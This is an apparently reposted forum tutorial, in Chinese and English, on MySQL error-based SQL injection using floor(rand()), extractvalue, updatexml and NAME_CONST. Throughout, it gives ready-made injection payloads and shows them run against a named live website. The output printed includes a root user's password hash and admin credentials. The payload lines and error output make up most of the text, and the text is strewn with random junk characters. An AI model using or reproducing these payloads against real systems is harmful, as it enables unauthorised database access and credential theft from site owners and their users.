1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
- n* a( M' {( c& C+ o首先进行正常查询: mysql> select * from article where id = 1;( u' ]8 _# B# a& }% d' h1 w4 V. U1 d
+—-+——-+———++ x& O7 |& o, i: V
| id | title | content |- o7 X9 @. C# O N8 i$ e
+—-+——-+———+
1 q+ ~ V) L. F. S- J: Y| 1 | test | do it |4 T! W1 x0 j4 A. b( d0 Q& L
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ X. v& T' _+ J& u, wERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。4 T: s0 m6 q- K1 M, h
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
. a" X1 j- ?9 n8 p/ t1 tERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
" E3 F& F8 \- h+ N3 xERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
) Z+ c8 c0 S3 D0 F测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–! f, z. B& r( O$ b2 Z
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 6 s: j2 W, N9 ]1 s# v! L# }
6 w( G- x; _& y
再收集: # w' D1 r- E- t* e8 c: e, P
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ( p$ q% y, Y' F' A4 o H0 \
1 y* Y5 ~1 `5 [
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’6 c( ~: B9 \; q t9 W! e# a; e$ k
/ F! N9 Z. v I4 t1 S) @http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
1 Y: u f0 C8 D' z" M
2 g% S) d1 ~9 E9 I3 }) _$ @0 [Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
6 H3 T; w( N$ F$ x
- h3 M; B8 g- kMYSQL高版本报错注入技巧-利用NAME_CONST注入
( ?2 R3 Z7 h' P) I8 pIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. k" [" J. n) P. u
6 M$ c/ p0 V' p( [. l9 {; X* E: {" Y( H$ m# M c4 f
相关信息
; U" C) M, M5 N
3 V! P& F: m( `' F S3 _NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
. z2 h! K; L" d" N/ L( T% {; @$ x- e3 {8 n0 p
Code:4 L7 b3 L, t1 }5 X5 \1 `
NAME_CONST(DATA, VALUE)
2 E$ y0 s+ U0 e( ^) Y+ Q, n% w1 A6 Z! y/ D- n) Z
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.0 x U; J0 j5 w6 E4 B& I, m: `# J
6 g9 b* Z. h C3 mSELECT NAME_CONST('TEST', 1)
+ z" M% y# r _/ I; ^* m4 D4 {0 r; J
3 u* o* c; {. L) C i2 f8 k) u; I( r' z9 I3 P; s. K6 Q Z
|---------------|" b7 S; m( B3 p% d
| TEST |0 I: U$ d, |5 T' L& n3 J. l
| |
" b' Z" t+ b* }; f|---------------|
' j: F: q# L5 C| 1 |
% _7 [# }( e @/ O| |( e# j# ]) |# @" n8 Y
|---------------|
1 K+ Q' }8 I4 @4 x( Q: M0 o8 Z4 |! e+ Z q& S$ U+ q& _, C
) s6 U9 p; \* H+ O o5 h6 Z- ~- s9 d+ P7 U( {' a; o' ?0 P
' q2 w4 _* P7 j+ x. I8 s
http://dev.mysql.com/doc/refman/5.0/en/m...name-const4 i5 N A0 M+ E# \: k& }
Intro to MySQL Variables
. p" K9 v& t2 i1 [& j- g5 U7 N9 L v- W. l2 A: X
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.4 }& \1 ^2 i: Q4 [2 I6 @% s
: A6 ]2 a* c# t/ c$ M5 X" p
Code:
1 l" i' V2 K7 H8 }http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
. z( W1 ?3 P- @7 ?) T% H4 ~
" `, t6 u! T: e1 X& B- z7 Q7 }% N+ D* F1 f1 c4 j
$ H% d- Z# y% z4 D* m ]; s" U/ p
) c; e6 n& d! B( h, `, z0 U# u& l
8 i8 ]# w" d, B8 Y0 D8 N* u% R, y
Code:
& `4 m2 u4 y7 U' Y$ Dand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--. O) R" I! M/ b: L: z4 w
: T8 }) s$ Q6 p E6 v0 b3 g
$ b( v% ]* [- l# E' F j8 NVAR = Your MySQL variable.' C9 ]2 C$ Z. D# s* U e, i
# e: _0 S- ~! eMySQL 5.1.3 Server System Variables5 S M* ~9 u2 U8 V- {! t
. f. J {, h8 zLet's try it out on my site..- @5 K' i4 u3 |6 w# k- N
) z& a% m }- ]/ Z) U1 }! {3 zCode:- w9 J8 U3 e3 ]- N0 a
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--# D7 J* l! u: v* S1 a! o: Q
# @$ b0 c2 ?2 M. N; X
Erroruplicate column name '5.0.27-community-nt'& t& k0 i$ C+ S5 B4 ?1 ?
4 ] i( k I i& X: S* w6 Y" ~+ E) W5 q! E3 B" G3 P
; w- l2 q$ q, U+ [4 \# F- A$ q! X! L% m4 i n2 G
# t% U. R! i# {Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...2 ^. x* a9 R/ ^! [; g
' C. X. p8 S/ L2 |$ S- q6 t
Data Extraction& F3 W0 @1 \% m5 J
- D$ D6 l+ Y4 a- Y4 w& wCode:
# u" \ _2 U3 T; e! ^& d+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
9 g5 W3 y8 ~7 H# \, u8 s( T
& J) ~/ f# B4 m1 u4 r s: Z5 U% M+ G5 O! V P. s6 }5 P, l6 a
We should get a duplicate column 1 error..." F$ w1 C" V$ y: c
- z/ I" H: q$ X$ }* v- p
Code:
1 {4 F& ]* D4 L7 w/ p6 m ~http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
5 [; F- l ]3 W3 ^( t! @. F" K, Y! u% [4 v- F$ @: x4 E8 S! C
Erroruplicate column name '1
$ I! n/ ^7 L- \& v
0 r+ n8 w( a* J, C, g! E5 F7 |2 O ? I: ?' V n
@) D( P. K, |6 K( N1 s
" A" W+ V5 m/ g6 h( h* F$ v5 E8 [
3 N; K; z N0 ]0 t y5 F
Now let's get the tables out this bitch..
& [' N: F' a7 G: ]" i* |: M' c" G' q5 M9 Y1 ~' C
Code:0 s" k- P$ G' b$ |% J
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
0 T7 ~ S# ? J- K5 R* M @! s; |: D1 R' r6 T3 B0 h
' o- m0 z! f5 \5 N7 V `' GLet's see if it works here, if it does, we can go on and finish the job.: r. v# ~' L! p* P( @* b" j
) Y4 z- W4 l. A! j% I4 }Code: |9 Y* L( Q* G$ U
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--0 A n2 |, D8 f; H! G
; s+ A. \% @( t4 g5 U4 d* W% V" M! o/ S5 h( I5 _
Erroruplicate column name 'com_admanage M. m0 j" V/ c [/ k$ K; E, G8 `3 N* ?
/ M( H& T) G5 i- w( E
$ R' H' E! p6 O7 i6 v
+ h& b3 }' B8 \' z4 G) ?! c- w: r* r0 K( Z. Y6 E
0 c) Y) B- v3 Z- p& q6 R, P( G' q1 x& X% ^) {9 S; f- Z( i" o
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.3 Z7 T$ o# i1 c1 E5 c
6 j/ _: O" t! h: oLet's get the columns out of the user table.., d, w% J. |+ I2 K4 j9 `% X' @3 f
5 [$ F% r1 Z6 }+ |8 {2 FCode:
0 C, R$ p. J6 S/ l; X- E+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
8 |9 V9 Z1 H# N
6 E: `' D0 c' \" [: j0 k, Z- u4 k( X
3 M2 j3 ]! W. XSo mine looks like this, and I get the duplicate column name 'Host'.
1 v+ N' l% Z S2 |& F3 r8 s& m
7 \" b! Z4 S& E4 k4 ]; ECode:
$ `% r; ^" ]7 S: z I! M$ jhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--/ @5 `2 a" ]( E* l
* k* t1 U$ n! x7 J& H8 J xErroruplicate column name 'Host'$ h' F7 @: V7 ?" o
5 j) U S( S1 U0 V& m N; `1 [
" M9 Z, F: t7 J. r
9 \" }- t" X* e* P3 D9 f! E1 }1 }
+ T7 D& K5 D. E) Z0 B0 C; q* H; o" M) s% D% X
( m O" Y8 y, W7 @
Woot, time to finish this bitch off. d! ?9 c* l( Y, A# t9 R0 ?1 V2 w
( R! A2 x' `" t+ G! x, b* v$ }Code:
) Q+ \! I w3 z9 }% X8 E7 F8 U: p+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
! R; t# ~4 t9 ~5 Q5 D* [( e
5 ~) A M; Y3 R# O5 N
% f. ^$ k+ F# Q* mSo mine looks like this..." H6 i7 C; B, `7 c6 y
1 p. n6 Q9 o. A: G j
Code:
( x. X5 R+ s+ l# E4 F3 S9 a8 Rhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--' Q* r1 V' Q# f1 H: q
' A* Q: M$ N$ M0 |+ U
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 l$ D/ z6 `$ |% m/ K+ Q) I
8 e# |5 Q3 |- X- A& I0 z) f+ \% b2 s+ l% _4 Q
" O& f) N/ n% [( i9 U7 T1 V: [& p
8 i. v. n/ C4 T5 a) p) a* [% V% b6 o( e2 C W$ Q: P
% o# @- a! H7 ~* v1 x
And there we have it, thanks for reading.
3 m: p3 Z- m3 ?) p' T# W: A8 E: C4 L8 U1 D% w
|